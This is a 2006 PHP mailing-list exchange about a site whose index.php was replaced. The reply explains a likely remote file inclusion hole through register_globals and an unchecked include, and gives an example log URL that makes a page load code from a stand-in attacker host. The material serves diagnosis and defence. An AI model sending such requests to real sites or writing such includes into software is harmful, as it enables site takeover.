On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites "highjacked". What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
